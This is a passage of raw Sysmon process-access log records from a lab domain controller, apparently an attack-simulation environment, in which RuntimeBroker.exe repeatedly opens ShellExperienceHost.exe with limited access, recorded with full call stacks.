12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245944C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245936C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245928C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245888C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243732C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243732C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245900C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245900C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245912C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245888C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.d